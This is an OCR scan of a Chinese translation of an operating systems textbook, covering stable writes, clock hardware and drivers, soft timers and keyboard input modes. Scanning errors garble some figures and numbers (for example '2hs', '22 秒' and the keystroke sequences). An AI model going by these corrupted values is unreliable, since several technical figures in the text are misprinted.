原 的 时 刻 : 恢复 程序 将 块 从 驱动 器 1 复制 到 驱动 器 2 上 。 写 是 成 功 的 。 
ECC 
nec PR, 
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图 5-27 崩溃 对 于 稳定 写 的 影响 的 分 析 


图 5-27d 与 图 5-27b 相 类 似 ， 在 恢复 期 间 用 好 的 块 覆盖 坏 的 块 。 不 同 的 是 ， 两 个 块 的 最 终 取 值 都 是 新 的 。 

最 后 ， 在 图 5-27e 中 ， 恢 复 程 序 看 到 两 个 块 是 相同 的 ， 所 以 什么 都 不 用 修改 并 且 在 此 处 写 也 是 成 功 的 。 

对 于 这 一 模式 进行 各 种 各 样 的 优化 和 改进 都 是 可 能 的 。 首 先 ， 在 崩溃 之 后 对 所 有 的 块 两 个 两 个 地 进 
行 比较 是 可 行 的， 但 是 代价 高 晶 。 一 个 巨大 的 改进 是 在 稳定 写 期 间 跟踪 被 写 的 是 哪个 块 ， 这 样 在 恢复 的 
时 候 必须 被 检验 的 块 就 只 有 一 个 。 某 些 计算 机 拥有 少量 的 非 易 失 性 RAM (nonvolatile RAM) ， 它 是 一 个 
特殊 的 CMOS 存 储 器 ， 由 锂电 池 供电 。 这 样 的 电池 能 够 维持 很 多 年 ， 甚 至 有 可 能 是 计算 机 的 整个 生命 周 
期 。 与 主 存 不 同 〈 它 在 崩溃 之 后 就 丢失 了 ) ， 非 易 失 性 RAM 在 崩溃 之 后 并 不 丢失 。 每 天 的 时 间 通 常 就 保 
存在 这 里 (并且 通过 一 个 特殊 的 电路 进行 增值 )， 这 就 是 为 什么 计算 机 即使 在 拔 掉 电源 之 后 仍然 知道 是 
什么 时 间 。 

假设 非 易 失 性 RAM 的 几 个 字 节 可 供 操作 系统 使 用 ， 稳 定 写 就 可 以 在 开始 写 之 前 将 准备 要 更 新 的 块 
的 编号 放 到 非 易 失 性 RAM 里 。 在 成 功 地 完成 稳定 写 之 后 ， 在 非 易 失 性 RAM 中 的 块 编号 用 一 个 无 效 的 块 
编号 〈 例 如 -1) 覆盖 掉 。 在 这 些 情形 下 ， 崩 溃 之 后 恢复 程序 可 以 检验 非 易 失 性 RAM 以 了 解 在 崩溃 期 间 
是 否 有 一 个 稳定 写 正在 进行 中 ， 如 果 是 的 话 ， 还 可 以 了 解 在 崩溃 发 生 的 时 候 被 写 的 是 哪 一 个 块 。 然 后 ， 
可 以 对 块 的 两 个 副本 进行 正确 性 和 一 致 性 检验 。 

如 果 没 有 非 易 失 性 RAM 可 用 ， 可 以 对 它 模拟 如 下 。 在 稳定 写 开始 时 ， 用 将 要 被 稳定 写 的 块 的 编号 
覆盖 驱动 器 1 上 的 一 个 固定 的 块 ， 然 后 读 回 该 块 以 对 其 进行 校 验 。 在 使 得 该 块 正确 之 后 ， 对 驱动 器 2 上 对 
应 的 块 进行 写 和 校 验 。 当 稳定 写 正确 地 完成 时 ， 用 一 个 无 效 的 块 编号 覆盖 两 个 块 并 进行 校 验 。 这 样 一 来 ， 
崩溃 之 后 就 很 容易 确定 在 崩溃 期 间 是 否 有 一 个 稳定 写 正在 进行 中 。 当 然 ， 这 一 技术 为 了 写 一 个 稳定 的 块 
需要 8 次 额外 的 磁盘 操作 ， 所 以 应 该 极 少量 地 应 用 该 技术 。 

还 有 最 后 一 点 值得 讨论 。 我 们 假设 每 天 每 一 对 块 只 发 生 一 个 好 块 自发 损坏 成 为 坏 块 。 如 果 经 过 足够 
长 的 时 间 ， 另 一 个 块 也 可 能 变 坏 。 因 此 ， 为 了 修复 任何 损害 每 天 必须 对 两 块 磁盘 进行 一 次 完整 的 扫描 。 
这 样 ， 每 天 早晨 两 块 磁盘 总 是 一 模 一 样 的 。 即 便 在 一 个 时 期 内 一 对 中 的 两 个 块 都 坏 了 ， 所 有 的 错误 也 都 
能 正确 地 修复 。 


5.5 时 钟 

时 钟 (clock) 又 称 为 定时 器 (timer) ， 由 于 各 种 各 样 的 原因 决定 了 它 对 于 任何 多 道 程序 设计 系统 的 
操作 都 是 至 关 重 要 的 。 时 钟 负责 维护 时 间 ， 并 且 防 止 一 个 进程 垄断 CPU， 此 外 还 有 其 他 的 功能 。 时 钟 软 
件 可 以 采用 设备 驱动 程序 的 形式 ， 尽 管 时 钟 既 不 像 磁 盘 那 样 是 一 个 块 设备 ， 也 不 像 鼠 标 那 样 是 一 个 字符 
设备 。 我 们 对 时 钟 的 研究 将 遵循 与 前 面 几 节 相同 的 模式 : 首先 考虑 时 钟 硬件 ， 然 后 考虑 时 钟 软件 。 


5.5.1 时 钟 硬件 
在 计算 机 里 通常 使 用 两 种 类 型 的 时 钟 , 这 两 种 类 型 的 时 钟 与 人 们 使 用 的 钟表 和 手表 有 相当 大 的 差异 。 
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比较 简单 的 时 钟 被 连接 到 110V 或 220V 的 电源 线 上 ， 这 样 每 个 电压 周期 产生 一 个 中 断 ， 频 率 是 50Hz 或 
60Hz。 这 些 时 钟 过 去 曾经 占据 统治 地 位 ， 但 是 如 今 却 非 常 罕见 。 
另 一 种 类 型 的 时 钟 由 三 个 部 件 构成 : 晶体 振荡 器 、 计 数 器 和 存储 寄存 器 ， 如 图 5-28 所 示 。 当 把 一 块 


石英 晶体 适当 地 切割 并 且 安装 在 一 定 的 电压 之 ,晶体 振东 器 

下 时 ， 它 就 可 以 产生 非常 精确 的 周期 性 信号 ， i 

典型 的 频率 范围 是 几 百 兆赫 兹 ， 具 体 的 频率 什 

与 所 选 的 晶体 有 关 。 使 用 电子 器 件 可 以 将 这 一 ieeee— 
基础 信号 乘 以 一 个 小 的 整数 来 获得 高 达 个 脉冲 递减 


1000MHz 甚 至 更 高 的 频率 。 在 任何 一 台 计算 机 

里 通常 都 可 以 找到 至 少 一 个 这 样 的 电路 ， 它 给 Pir een) 存储 寄存 器 用 

计算 机 的 各 种 电路 提供 同步 信号 。 该 信号 被 送 于 加 载 计数 器 
t ; i 0, 4i 0 

人 当 计 数 器 变 为 图 5-28 可 编程 时 钟 

可 编程 时 钟 通常 具有 几 种 操作 模式 。 在 一 次 完成 模式 (one-shot mode) 下 ， 当 时 钟 启动 时 ， 它 把 存 
储 寄存 器 的 值 复制 到 计数 器 中 ， 然 后 ， 来 自 晶 体 的 每 一 个 脉冲 使 计数 器 减 1。 当 计数 器 变 为 0 时 ， 产 生 一 
个 中 断 ， 并 停止 工作 ， 直 到 软件 再 一 次 显 式 地 启动 它 。 在 方 波 模式 (square-wave mode) 下 ， 当 计数 器 
变 为 0 并 且 产 生 中 断 之 后 ， 存 储 寄存 器 的 值 自动 复制 到 计数 器 中 ， 并 且 整 个 过 程 无 限期 地 再 次 重复 下 去 。 
这 些 周期 性 的 中 断 称 为 时 钟 滴答 (clock tick), 

可 编程 时 钟 的 优点 是 其 中 断 频率 可 以 由 软件 控制 。 如 果 采 用 500MHz 的 晶体 ， 那 么 计数 器 将 每 隔 2ns 
脉动 一 次 。 对 于 (无 符号 ) 32 位 寄存 器 ， 中 断 可 以 被 编程 为 从 2ns 时 间 间 隔 发 生 一 次 到 8.6s 时 间 间 隔 发 生 
一 次 。 可 编程 时 钟 芯片 通常 包含 两 个 或 三 个 独立 的 可 编程 时 钟 ， 并 且 还 具有 许多 其 他 选项 (例如 ， 用 正 
计时 代替 倒计时 、 屏 蔽 中 断 等 ) 。 

为 了 防止 计算 机 的 电源 被 切断 时 丢失 当前 时 间 ， 大 多 数 计算 机 具有 一 个 由 电池 供电 的 备份 时 钟 ， 它 
是 由 在 数字 手表 中 使 用 的 那 种 类 型 的 低 功 耗 电路 实现 的 。 电 池 时 钟 可 以 在 系统 启动 的 时 候 读 出 。 如 果 不 
存在 备份 时 钟 ， 软 件 可 能 会 向 用 户 询问 当前 日 期 和 时 间 。 对 于 一 个 连 入 网 络 的 系统 而 言 还 有 一 种 从 远程 
主机 获取 当前 时 间 的 标准 方法 。 无 论 是 哪 种 情况 ， 当 前 时 间 都 要 像 UNIX 所 做 的 那样 转换 成 自 1970 年 1 月 
1 日 上 午 12 时 UTC (Universal Time Coordinated， 协 调 世界 时 ， 以 前 称 为 格林 威 治 平均 时 ) 以 来 的 时 钟 
滴答 数 ， 或 者 转换 成 自 某 个 其 他 标准 时 间 以 来 的 时 钟 滴答 数 。Windows 的 时 间 原 点 是 1980 年 1 月 1 日 。 每 
一 次 时 钟 滴答 都 使 实际 时 间 增加 一 个 计数 。 通 常会 提供 实用 程序 来 手工 设置 系统 时 钟 和 备份 时 钟 ， 并 且 
使 两 个 时 钟 保持 同步 。 


5.5.2 ”时钟 软件 

时 钟 硬件 所 做 的 全 部 工作 是 根据 已 知 的 时 间 间 隔 产生 中 断 。 涉 及 时 间 的 其 他 所 有 工作 都 必须 由 软件 一 一 
时 钟 驱动 程序 完成 。 时 钟 驱动 程序 的 确切 任务 因 操作 系统 而 异 ， 但 通常 包括 下 面 的 大 多 数 任务 : 

1) 维护 日 时 间 。 

2) 防止 进程 超时 运行 。 

3) 对 CPU 的 使 用 情况 记 账 。 

4) 处 理 用 户 进程 提出 的 alarm 系 统 调用 。 

5) 为 系统 本 身 的 各 个 部 分 提供 监视 定时 器 。 

6) 完成 概要 剖析 、 监 视 和 统计 信息 收集 。 

时 钟 的 第 一 个 功能 是 维持 正确 的 日 时 间 ， 也 称 为 实际 时 间 (real time)， 这 并 不 难 实现 ， 只 需要 如 
前 面 提 到 的 那样 在 每 个 时 钟 滴答 将 计数 器 加 1 即 可 。 唯 一 要 当心 的 事情 是 日 时 间 计数 器 的 位 数 ， 对 于 一 
个 频率 为 60Hz 的 时 钟 来 说 ，32 位 的 计数 器 仅仅 超过 2 年 就 会 溢出 。 很 显然 ， 系 统 不 可 能 在 32 位 寄存 器 中 
按照 自 1970 年 1 月 1 日 以 来 的 时 钟 滴答 数 来 保存 实际 时 间 。 

可 以 采取 三 种 方法 来 解决 这 一 问题 。 第 一 种 方法 是 使 用 一 个 64 位 的 计数 器 ， 但 这 样 做 会 使 维护 计数 
器 的 代价 变 得 很 高 ， 因 为 1 秒 内 需要 做 很 多 次 维护 计数 器 的 工作 。 第 二 种 方法 是 以 秒 为 单位 维护 日 时 间 ， 
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而 不 是 以 时 钟 滴答 为 单位 ， 该 方法 使 用 一 个 辅助 计数 器 来 对 时 钟 滴 答 计 数 ， 直 到 累计 至 完整 的 一 秒 。 因 
为 22 秒 超过 了 136 年 ， 所 以 该 方法 可 以 工作 到 22 世 纪 。 

第 三 种 方法 是 对 时 钟 滴答 计数 ， 但 是 这 一 计数 工作 是 相对 于 系统 引导 的 时 间 ， 而 不 是 相对 于 一 个 固 
定 的 外 部 时 间 。 当 读 入 备份 时 钟 或 者 用 户 输入 实际 时 间 时 ， 系 统 引 导 时 间 就 从 当前 日 时 间 开始 计算 ， 并 
且 以 任何 方便 的 形式 存放 在 内 存 中 。 以 后 ， 当 请 求 日 时 间 时 ， 将 存储 的 日 时 间 值 加 到 计数 器 上 就 可 以 得 
到 当前 的 日 时 间 。 所 有 这 三 种 方法 如 图 5-29 所 示 。 


| 
[am [一 中， 请 


以 秒 为 单位 ”在 当前 一 秒 内 以 时 钟 滴答 
的 日 时 间 的 时 钟 滴答 数 “为 单位 计数 | 
以 秒 为 单位 的 系 


统 引 导 时 间 
a) b) c) 





图 5-29 维护 日 时 间 的 三 种 方法 


时 钟 的 第 二 个 功能 是 防止 进程 超时 运行 。 每 当 启动 一 个 进程 时 ， 调 度 程序 就 将 一 个 计数 器 初始 化 为 
以 时 钟 滴答 为 单位 的 该 进程 时 间 片 的 取 值 。 每 次 时 钟 中 断 时 ， 时 钟 驱动 程序 将 时 间 片 计数 器 减 1。 当 计 
数 器 变 为 0 时 ， 时 钟 驱动 程序 调用 调度 程序 以 激活 另 一 个 进程。 

时 钟 的 第 三 个 功能 是 CPU 记 账 。 最 精确 的 记 账 方法 是 ， 每 当 一 个 进程 启动 时 ， 便 启动 一 个 不 同 于 主 
系统 定时 器 的 辅助 定时 器 。 当 进程 终止 时 ， 读 出 这 个 定时 器 的 值 就 可 以 知道 该 进程 运行 了 多 长 时 间 。 为 
了 正确 地 记 账 ， 当 中 断 发 生 时 应 该 将 辅助 定时 器 保存 起 来 ， 中 断 结束 后 再 将 其 恢复 。 

一 个 不 太 精 确 但 更 加 简单 的 记 账 方法 是 在 一 个 全 局 变量 中 维护 一 个 指针 ， 该 指针 指向 进程 表 中 当前 
运行 的 进程 的 表 项 。 在 每 一 个 时 钟 滴答 ， 使 当前 进程 的 表 项 中 的 一 个 域 加 1。 通 过 这 一 方法 ， 每 个 时 名 
滴答 由 在 该 滴答 时 刻 运行 的 进程 “付费 ”。 这 一 策略 的 一 个 小 问题 是 ， 如 果 在 一 个 进程 运行 过 程 中 多 次 
发 生 中 断 ， 即 使 该 进程 没有 做 多 少 工作 ， 它 仍然 要 为 整个 滴答 付费 。 由 于 在 中 断 期 间 恰当 地 对 CPU 进行 
记 账 的 方法 代价 过 于 昂贵 ， 因 此 很 少 使 用 。 

在 许多 系统 中 ， 进 程 可 以 请 求 操作 系统 在 一 定 的 时 间 间 隔 之 后 向 它 报警 。 警 报 通常 是 信号 、 中 断 、 
消息 或 者 类 似 的 东西 。 需 要 这 类 报警 的 一 个 应 用 是 网 络 , 当 一 个 数据 包 在 一 定时 间 间 隔 之 内 没有 被 确认 时 ， 
该 数据 包 必须 重 发 。 另 一 个 应 用 是 计算 机 辅助 教学 ， 如 果 学 生 在 一 定时 间 内 没有 响应 ， 就 告诉 他 答案 。 

如 果 时 钟 驱动 程序 拥有 足够 的 时 钟 ， 它 就 可 以 为 每 个 请 求 设置 一 个 单独 的 时 钟 。 如 果 不 是 这 样 的 情 
况 ， 它 就 必须 用 一 个 物理 时 钟 来 模拟 多 个 虚拟 时 钟 。 一 种 方法 是 维护 一 张 表 ， 将 所 有 未 完成 的 定时 器 的 信 
号 时 刻 记 入 表 中 ， 还 要 维护 一 个 变量 给 出 下 一 个 信号 的 时 刻 。 每 当日 时 间 更 新 时 ， 时 钟 驱动 程序 进行 检查 
以 了 解 最 近 的 信号 是 否 已 经 发 生 。 如 果 是 的 话 ， 则 在 表 中 搜索 下 一 个 要 发 生 的 信号 的 时 刻 。 

如 果 预 期 有 许多 信号 ， 那 么 通过 在 一 个 链 
表 中 把 所 有 未 完成 的 时 钟 请 求 按时 间 排序 链接 SRE. TITEe 
在 一 起 ， 这 样 来 模拟 多 个 时 钟 则 更 为 有 效 ， 如 
图 5-30 所 示 。 链 表 中 的 每 个 表 项 指出 在 前 一 个 
信号 之 后 等 待 多 少时 钟 滴答 引发 下 一 个 信号 。 
在 本 例 中 ， 等 待 处 理 的 信号 对 应 的 时 钟 滴答 分 
别 是 4203、4207、4213、4215 和 4216。 图 5-30 用 单个 时 钟 模拟 多 个 定时 器 

在 图 5-30 中 ， 经 过 3 个 时 钟 滴答 发 生 下 一 个 
中 断 。 每 一 次 滴答 时 ， 下 一 个 信号 减 1， 当 它 变 为 0 时 ， 就 引发 与 链表 中 第 一 个 表 项 相对 应 的 信号 ， 并 将 这 
一 表 项 从 链表 中 删除 ， 然 后 将 下 一 个 信号 设置 为 现在 处 于 链表 头 的 表 项 的 取 值 ， 在 本 例 中 是 4。 

注意 在 时 钟 中 断 期 间 ， 时 钟 驱动 程序 要 做 几 件 事情 一 “将 实际 时 间 增 1， 将 时 间 片 减 1 并 检查 它 是 否 
为 0， 对 CPU 记 账 ， 以 及 将 报警 计数 器 减 1。 然 而 ， 因 为 这 些 操作 在 每 一 秒 之 中 要 重复 许多 次 ， 所 以 每 个 
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操作 都 必须 仔细 地 安排 以 加 快速 度 。 

操作 系统 的 组 成 部 分 也 需要 设置 定时 器 ， 这 些 定时 器 被 称 为 监视 定时 器 (watchdog timer) © ,并且 
经 常用 来 检测 死机 之 类 的 问题 (特别 是 在 戏 入 式 设备 中 ) 。 例 如 ， 监 视 定 时 器 可 以 用 来 对 停止 运行 的 系 
统 进行 复位 。 在 系统 运行 时 ， 它 会 定期 复位 定时 器 ， 所 以 定时 器 永远 不 会 过 期 。 既 然 如 此 ， 定 时 器 过 期 
则 证 明 系 统 已 经 很 长 时 间 没 有 运行 了 ， 这 就 会 导致 纠正 的 行动 一 一 例如 全 系统 复位 。 

时 钟 驱动 程序 用 来 处 理 监 视 定时 器 的 机 制 和 用 于 用 户 信 号 的 机 制 是 相同 的 。 唯 一 的 区 别 是 当 一 个 定 
时 器 时 间 到 时 ， 时 钟 驱动 程序 将 调用 一 个 由 调用 者 提供 的 过 程 ， 而 不 是 引发 一 个 信号 。 这 个 过 程 是 调用 
者 代码 的 一 部 分 。 被 调用 的 过 程 可 以 做 任何 需要 做 的 工作 ， 甚 至 可 以 引发 一 个 中 断 ， 但 是 在 内 核 之 中 中 
断 通常 是 不 方便 的 并 且 信 号 也 不 存在 。 这 就 是 为 什么 要 提供 监视 定时 器 机 制 。 值 得 注意 的 是 ， 只 有 当时 
钟 驱动 程序 与 被 调用 的 过 程 处 于 相同 的 地 址 空间 时 ， 监 视 定时 器 机 制 才 起 作用 。 

时 钟 最 后 要 做 的 事情 是 剖析 (profiling)。 某 些 操作 系统 提供 了 一 种 机 制 ， 通 过 该 机 制 用 户 程序 可 
以 让 系统 构造 它 的 程序 计数 器 的 一 个 直方 图 ， 这 样 它 就 可 以 了 解 时 间 花 在 了 什么 地 方 。 当 剖析 是 可 能 的 
事情 时 ， 在 每 一 时 钟 滴答 驱动 程序 都 要 检查 当前 进程 是 否 正在 被 进行 剖析 ， 如 果 是 ， 则 计算 对 应 于 当前 
程序 计数 器 的 区 间 (bin) O- (一 段 地 址 范围 ) ， 然 后 将 该 区 间 的 值 加 1。 这 一 机 制 也 可 用 来 对 系统 本 身 
进行 剖析 。 


5.5.3 软 定时 器 

大 多 数 计算 机 拥有 辅助 可 编程 时 钟 ， 可 以 设置 它 以 程序 需要 的 任何 速率 引发 定时 器 中 断 。 该 定时 器 
是 主 系统 定时 器 以 外 的 ， 而 主 系统 定时 器 的 功能 已 经 在 上 面 讲述 了 。 只 要 中 断 频率 比较 低 ， 将 这 个 辅助 定 
时 器 用 于 应 用 程序 特定 的 目的 就 不 存在 任何 问题 。 但 是 当 应 用 程序 特定 的 定时 器 的 频率 非常 高 时 ， 麻 烦 就 
来 了 。 下 面 我 们 将 简要 描述 一 个 基于 软件 的 定时 器 模式 ， 它 在 许多 情况 下 性 能 良好 ， 甚 至 在 相当 高 的 频率 
下 也 是 如 此 。 这 一 思想 起 因 于 (Aron 和 Druschel，1999) 。 关 于 更 详细 的 细节 ， 请 参阅 他 们 的 论文 。 

一 般 而 言 ， 有 两 种 方法 管理 IO: 中 断 和 轮 询 。 中 断 具 有 较 低 的 响应 时 间 (latency) ， 也 就 是 说 ， 中 
断 在 事件 本 身 之 后 立即 发 生 ， 具 有 很 少 的 延迟 (delay) 或 者 没有 延迟 8。 另 一 方面 ， 对 于 现代 CPU 而 言 ， 
由 于 需要 上 下 文 切 换 以 及 对 于 流水 线 、TLB 和 高 速 缓存 的 影响 ， 中 断 具 有 相当 大 的 开销 。 

替代 中 断 的 是 让 应 用 程序 对 它 本 身 期 待 的 事件 进行 轮 询 。 这 样 做 避免 了 中 断 ， 但 是 可 能 存在 相当 长 
的 等 待 时 间 ， 因 为 一 个 事件 可 能 正好 发 生 在 一 次 轮 询 之 后 , 在 这 种 情况 下 它 就 要 等 待 几乎 整个 轮 询 间隔 。 
平均 而 言 ， 等 待 时 间 是 轮 询 间隔 的 一 半 。 

对 于 某 些 应 用 而 言 ， 中 断 的 开销 和 轮 询 的 等 待 时 间 都 是 不 能 接受 的 。 例如， 考虑 一 个 高 性 能 的 网 络 ， 
如 千 兆 位 以 太 网 。 该 网 络 能 够 每 12us 接 收 或 者 发 送 一 个 全 长 的 数据 包 。 为 了 以 最 佳 的 输出 性 能 运行 ， 每 
隔 12us 就 应 该 发 出 一 个 数据 包 。 

达到 这 一 速率 的 一 种 方法 是 当 一 个 数据 包 传输 完成 时 引发 一 个 中 断 ， 或 者 将 辅助 定时 器 设置 为 每 
12us 中 断 一 次 。 问 题 是 在 一 个 300 MHz 的 Pentium II 计 算 机 上 该 中 断 经 实测 要 花费 4.45hs 的 时 间 (Aron 
和 Druschel，1999)。 这 样 的 开销 比 20 世 纪 70 年 代 的 计算 机 好 不 了 多 少 。 例 如 ， 在 大 多 数 小 型 机 上 ， 一 
个 中 断 要 占用 4 个 总 线 周 期 : 将 程序 计数 器 和 PSW 压 入 堆栈 并 且 加 载 一 个 新 的 程序 计数 器 和 PSW。 现 如 
今 涉及 流水 线 、MMU、TLB 和 高 速 缓存 ， 更 是 增加 了 大 量 的 开销 。 这 些 影响 可 能 在 时 间 上 使 情况 变 得 
更 坏 而 不 是 变 得 更 好 ， 因 此 抵消 了 更 快 的 时 钟 速率 。 

软 定时 器 (soft timer) 避免 了 中 断 。 无 论 何 时 当 内 核 因 某 种 其 他 原因 在 运行 时 ， 在 它 返 回 到 用 户 态 之 
前 ， 它 都 要 检查 实时 时 钟 以 了 解 软 定 时 器 是 否 到 期 。 如 果 这 个 定时 器 已 经 到 期 ， 则 执行 被 调度 的 事件 ( 例 


© watchdog timer 也 经 常 译 为 看 门 狗 定时 器 。 一 一 译 者 注 

© AAA (histogram) 用 于 描述 随机 变量 取 值 分 布 的 情况 ， 虽 然 在 中 文 术语 中 有 一 个 “图 ” 字 ， 但 并 不 是 必 
须 用 图 形 来 表示 。 它 将 随机 变量 (对 于 本 例 而 言 是 程序 计数 器 的 取 值 ) 的 值 空间 (对 于 本 例 而 言 是 进程 的 
地 址 空间 ) 划分 成 若干 个 小 的 区 间 ， 每 个 小 区 间 就 是 一 个 bin。 通 过 计算 随机 变量 的 取 值 落 在 每 个 小 区 间 内 
的 次 数 就 可 以 得 到 直方 图 。 如 果 用 图 形 表示 直方 图 的 话 则 表现 为 一 系列 高 度 不 等 的 柱状 图 形 。 一 一 译 者 注 

© 在 国内 的 很 多 书籍 中 ，latency 和 delay 经 常 都 翻译 为 延 时 ， 容 易 造 成 混淆 。latency 本 质 上 是 激励 和 响应 之 间 
的 时 间 间 隔 ， 译 成 “响应 时 间 ” 或 者 “等 待 时 间 ” 更 加 确切 ，delay 则 是 延误 或 耽搁 的 意思 。 一 一 译 者 注 
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如 ， 传 送 数据 包 或 者 检查 到 来 的 数据 包 ) ， 而 无 需 切 换 到 内 核 态 ， 因 为 系统 已 经 在 内 核 态 。 在 完成 工作 之 
后 ， 软 定时 器 被 复位 以 便 再 次 阅 响 。 要 做 的 全 部 工作 是 将 当前 时 钟 值 复制 给 定时 器 并 且 将 超时 间隔 加 上 。 

软 定时 器 随 着 因为 其 他 原因 进入 内 核 的 频率 而 脉动 ， 这 些 原因 包括 : 

1) 系统 调用 。 

2) TLB 未 命中 。 

3) 页 面 故障 。 

4) IO 中 断 。 

5) CPU 变 成 空闲 。 

为 了 了 解 这 些 事件 发 生得 有 多 频繁 ，Aron 和 Druschel 对 于 几 种 CPU 负载 进行 了 测量 ， 包 括 全 负载 
Web 服 务 器 、 具 有 计算 约束 后 台 作 业 的 Web 服 务 器 、 从 因特网 上 播放 实时 音频 以 及 重 编译 UNIX 内 核 。 进 
入 内 核 的 平均 进入 率 在 2hs 到 1us 之 间 变 化 ， 其 中 大 约 一 半 是 系统 调用 。 因 此 ， 对 于 一 阶 近似 ， 让 一 个 软 
定时 器 每 隔 2hs 闸 响 一 次 是 可 行 的 ， 虽然 这 样 做 偶尔 会 错过 最 终 时 限 。 偶 尔 晚 10ks 往 往 比 让 中 断 消耗 掉 
35% 的 CPU 时 间 要 更 好 。 

当然 ， 可 能 有 一 段 时 间 不 存在 系统 调用 、TLB 未 命中 或 页 面 故障 ， 在 这 些 情况 下 ， 没 有 软 定时 器 会 
闸 响 。 为 了 在 这 些 时 间 间 隔 上 设置 一 个 最 大 值 ， 可 以 将 辅助 硬件 定时 器 设置 为 每 隔 一定 时间 (例如 1ms) 
疗 响 一 次 。 如 果 应 用 程序 对 于 偶尔 的 时 间 间 隔 能 够 忍受 每 秒 只 有 1000 个 数据 包 ， 那 么 软 定 时 器 和 低频 硬 
件 定时 器 的 组 合 可 能 比 纯粹 的 中 断 驱动 IO 或 者 纯粹 的 轮 询 要 好 。 


56 用 户 界面 : 键盘 、 鼠 标 和 监视 器 


每 台 通 用 计算 机 都 配 有 一 个 键盘 和 一 个 监视 器 (并 且 通 常 还 有 一 只 鼠标 ) ， 使 人 们 可 以 与 之 交互 。 
尽管 键盘 和 监视 器 在 技术 上 是 独立 的 设备 ， 但 是 它们 紧密 地 一 同 工 作 。 在 大 型 机 上 ， 通 常 存 在 许多 远程 
用 户 ， 每 个 用 户 拥有 一 个 设备 ， 该 设备 包括 一 个 键盘 和 一 个 连 在 一 起 的 显示 器 作为 一 个 单位 。 这 些 设备 
在 历史 上 被 称 为 终端 (terminal) 。 人 们 通常 继续 使 用 该 术语 ， 即 便 是 讨论 个 人 计算 机 时 (主要 是 因为 缺 
乏 更 好 的 术语 )。 


5.6.1 输入 软件 

用 户 输入 主要 来 自 键盘 和 鼠标 (有 时 还 有 触摸 屏 )， 所 以 我 们 要 了 解 它们 。 在 个 人 计算 机 上 ， 键盘 包 
含 一 个 嵌入 式微 处 理 器 ， 该 微 处 理 器 通过 一 个 特殊 的 串 行 端口 与 主板 上 的 控制 芯片 通信 (尽管 键盘 越 来 
越 多 地 连接 到 USB 端 口上 ) 。 每 当 一 个 键 被 按 下 的 时 候 都 会 产生 一 个 中 断 ， 并 且 每 当 一 个 键 被 释放 的 时 候 
还 会 产生 第 二 个 中 断 。 每 当 发 生 这 样 的 键盘 中 断 时 ， 键 盘 驱 动 程序 都 要 从 与 键盘 相关 联 的 IO 端口 提取 信 
息 ， 以 了 解 发 生 了 什么 事情 。 其 他 的 一 切 事情 都 是 在 软件 中 发 生 的 ， 在 相当 大 的 程度 上 独立 于 硬件 。 

当 想 象 往 shell 窗 口 (命令 行 界面 ) 键入 命令 时 ， 可 以 更 好 地 理解 本 小 节余 下 的 大 部 分 内 容 。 这 是 程 
序 员 通常 的 工作 方式 。 某 些 设备 (特别 是 触摸 屏 ) 用 于 输入 和 输出 ， 我 们 将 在 关于 输出 设备 的 小 节 中 讨 
论 它 们 。 本 章 的 后 面 将 讨论 图 形 界面 。 

1. 键盘 软件 

IO 端口 中 的 数字 是 键 的 编号 ， 称 为 扫描 码 (scan code) ， 而 不 是 ASCIH 码 。 键 盘 所 拥有 的 键 不 超过 
128 个 ， 所 以 只 需 7 个 位 表示 键 的 编号 。 当 键 按 下 时 ， 第 8 位 设置 为 0， 当 键 释放 时 ， 第 8 位 设置 为 1。 跟 踪 
每 个 键 的 状态 ( 按 下 或 弹 起 ) 是 驱动 程序 的 任务 。 所 以 ,硬件 所 做 的 全 部 工作 是 给 出 键 被 按 下 和 释放 的 
中 断 ， 其 他 的 事情 由 软件 来 做 。 

例如 ， 当 A 键 被 按 下 时 ， 扫 描 码 (30) 被 写 入 一 个 /0 寄存 器 。 驱 动 程序 应 该 负责 确定 键入 的 是 小 写 
字母 、 大 写字 母 、CTRL-A、ALT-A、CTRL-ALT-A 还 是 某 些 其 他 组 合 。 由 于 驱动 程序 可 以 断定 哪些 键 
已 经 按 下 但 是 还 没有 被 释放 (例如 SHIFT)， 所 以 它 拥 有 足够 多 的 信息 来 做 这 一 工作 。 

例如 ， 击 键 序列 
42 PF SHIFT, FA, FAA, FERSHIFT 
指示 的 是 大 写字 母 A。 然 而 击 键 序列 

42 FSHIFT, FA, #2SHIFT, BHA 
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指示 的 也 是 大 写字 母 A。 尽 管 该 键盘 接口 将 所 有 的 负担 都 加 在 软件 上 ， 但 是 却 极其 灵活 。 例 如 ， 用 户 程 
序 可 能 对 刚刚 键入 的 一 个 数字 是 来 自 顶端 的 一 排 键 还 是 来 自 边 上 的 数字 键盘 感 兴趣 。 原 则 上 ， 驱 动 程序 
能 够 提供 这 一 信息 。 

键盘 驱动 程序 可 以 采纳 两 种 可 能 的 处 理 方法 。 在 第 一 种 处 理 方法 中 ， 驱 动 程序 的 工作 只 是 接收 输入 
并 且 不 加 修改 地 向 上 层 传送 。 这 样 ， 从 键盘 读数 据 的 程序 得 到 的 是 ASCII 码 的 原始 序列 。( 向 用 户 程序 提 
供 扫描 码 过 于 原始 ， 并 且 高 度 地 依赖 于 机 器 。) 

这 种 处 理 方法 非常 适合 于 像 emacs 那 样 的 复杂 屏幕 编辑 器 的 需要 ， 它 人 允许 用 户 对 任意 字符 或 字符 序 
列 施加 任意 的 动作 。 然 而 ， 这 意味 着 如 果 用 户 键入 的 是 dste 而 不 是 date， 为 了 修改 错误 而 键入 三 个 退 格 
键 和 ate， 然 后 是 一 个 回 车 键 ， 那 么 提供 给 用 户 程序 的 是 键入 的 全 部 11 个 ASCII 码 ， 如 下 所 示 : 

dste 一 一 一 ate CR 


并 非 所 有 的 程序 都 想 要 这 么 多 的 细节 ， 它 们 常常 只 想 要 校正 后 的 输入 ， 而 不 是 如 何 产生 它 的 准确 的 
序列 。 这 一 认识 导致 了 第 二 种 处 理 方法 : 键盘 驱动 程序 处 理 全 部 行内 编辑 ， 并 且 只 将 校正 后 的 行 传送 给 
用 户 程 序 。 第 一 种 处 理 方法 是 面向 字符 的 ， 第 二 种 处 理 方法 是 面向 行 的 。 最 初 它们 分 别 被 称 为 原始 模式 
(raw mode) 和 加 工 模 式 (cooked mode)。POSIX 标 准 使 用 稍 欠 生动 的 术语 规范 模式 (canonical mode) 来 
描述 面向 行 的 模式 。 非 规范 模式 (noncanonical mode) 与 原始 模式 是 等 价 的 ， 尽 管 终端 行为 的 许多 细节 可 
能 被 修改 了 。POSIX 兼 容 的 系统 提供 了 若干 库 函 数 ， 支 持 选 择 这 两 种 模式 中 的 一 种 并 且 修改 许多 参数 。 

